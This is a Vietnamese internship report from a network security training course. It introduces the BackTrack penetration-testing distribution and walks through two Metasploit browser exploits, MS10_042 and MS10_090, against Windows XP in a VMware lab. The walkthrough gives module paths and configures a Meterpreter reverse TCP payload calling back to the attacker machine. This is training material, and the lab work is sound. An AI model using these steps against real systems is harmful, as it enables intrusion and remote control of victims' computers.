Báo cáo thực tập tuần 1 chủ đề nghiên cứu chức năng của backtrack để kiểm tra an ninh mạng

1. TRUNG TÂM ĐÀO TẠO QUẢNG TRỊ MẠNG VÀ AN
NINH MẠNG QUỐC TẾ ATHENA
Báo Cáo Tuần 1
Chủ đề: Nghiên Cứu về các chức năng của backtrack để
kiểm tra an ninh mạng.
Giáo viên hướng dẫn: Thầy Võ Đỗ Thắng
Thực tập viên: Đỗ Liên Hán
Các Vấn Đề Của Tuần Thứ 1:
1. Nhận tài liệu và gặp giáo viên hướng dẫn
2. Cài đặt backtrack 5r3
3. Thực hành làm quen với backtrack qua 2 lỗi MS10_090
và MS10_042

2. I. Backtrack là gì?
Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để
thử nghiệm thâm nhập. Trong các định dạng Live DVD, có thể sử dụng
Backtrack trực tiếp từ DVD hoặc cài đặt trên máy và sử dụng như một hệ điều
hành. Backtrack hỗ trợ một cách nhanh chóng cho việc tìm kiếm và cập nhật
cơ sở dữ liệu các công cụ bảo mật. Backtrack có lịch sử phát triển qua nhiều
bản Linux khác nhau (phiên bản hiện nay sử dụng bản phân phối Slackware
Linux) và liên tục cập nhập các công cụ, drivers qua các phiên bản… Công cụ
kiểm thử bảo mật trong Backtrack có thể được phân loại thành các nhóm như
sau:
Information gathering: Sử dụng để có được thông tin liên quan đến một mục
tiêu DNS, địa chỉ email, trang web, máy chủ mail….
Network mapping: Quét thăm dò, bao gồm việc kiểm tra các host đang tồn tại,
thông tin về hệ điều hành, ứng dụng được sử dụng bởi mục tiêu….
Vulnerability identification: Quét các lỗ hổng, phân tích Server Message
Block (SMB) và Simple Network Management Protocol (SNMP).
Web application analysis: Theo dõi, giám sát các ứng dụng web.
Radio network analysis: Kiểm tra mạng không dây, bluetooth và nhận dạng
tần số vô tuyến (RFID).
Penetration: Khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu.
Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các
máy tính mục tiêu, các công cụ trong loại này có thể sử dụng để leo thang đặc
quyền.

3. Maintaining access: Duy trì quyền truy cập vào các máy tính mục tiêu. Những
đặc quyền cao nhất là điều kiện cần thiết trước khi có thể cài đặt công cụ để
duy trì quyền truy cập.
Voice Over IP (VOIP): Các công cụ để phân tích VOIP.
Digital forensics: Phân tích hình ảnh đĩa cứng, cấu trúc các tập tincó thể chọn
Start Backtrack Forensics trong trình đơn khởi động.
Reverse engineering: Gỡ rối chương trình hoặc tháo rời tập tin thực thi.

4. II. Các bước thực hiện lỗi MS10_042 và MS10_090:
a. Lỗi MS10_042:
1. Khởi động VMWare với 2 cửa sổ backtrack và windows XP.
2. Ở cửa sổ backtrack, khởi động cửa sổ terminal và gõ lệnh
msfconsole.
3. Sau đó dung lệnh search ms10_042 đễ tìm kiếm module.
4. Kế tiếp dùng lệnh use
exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec.
5. Ta dùng lệnh show options để kiểm tra các thông tin thuộc tính cần
thiết cho mã lỗi.
6. Thiết lập các thông tin cần thiết như:
(1)Set srvhost [IP của máy backtrack]
(2)Set lhost [IP của máy backtrack]
(3)Set payload windows/meterpreter/reverse_tcp
7. Dùng lệnh exploit để triển khai.
8. Sau cùng là chờ máy nạn nhân truy cập vào địa chỉ đã exploit.
b. Lỗi MS10_090:
1. Khởi động VMWare với 2 cửa sổ backtrack và windows XP.
2. Ở cửa sổ backtrack, khởi động cửa sổ terminal và gõ lệnh
msfconsole.
3. Sau đó dung lệnh search ms10_090 đễ tìm kiếm module.
4. Kế tiếp dùng lệnh use
exploit/windows/browser/ms10_090_ie_css_clip.
5. Ta dùng lệnh show options để kiểm tra các thông tin thuộc tính cần
thiết cho mã lỗi.
6. Thiết lập các thông tin cần thiết như:
(1)Set srvhost [IP của máy backtrack]
(2)Set lhost [IP của máy backtrack]
(3)Set payload windows/meterpreter/reverse_tcp
7. Dùng lệnh exploit để triển khai.
8. Sau cùng là chờ máy nạn nhân truy cập vào đường dẫn đã exploit.

5. Demo cho 2 lỗi trên tại link:
MS10_042 ở tại trang: http://youtu.be/Vk5697U2dMg
MS10_090 ở tại trang: http://youtu.be/t3rewc4tcCw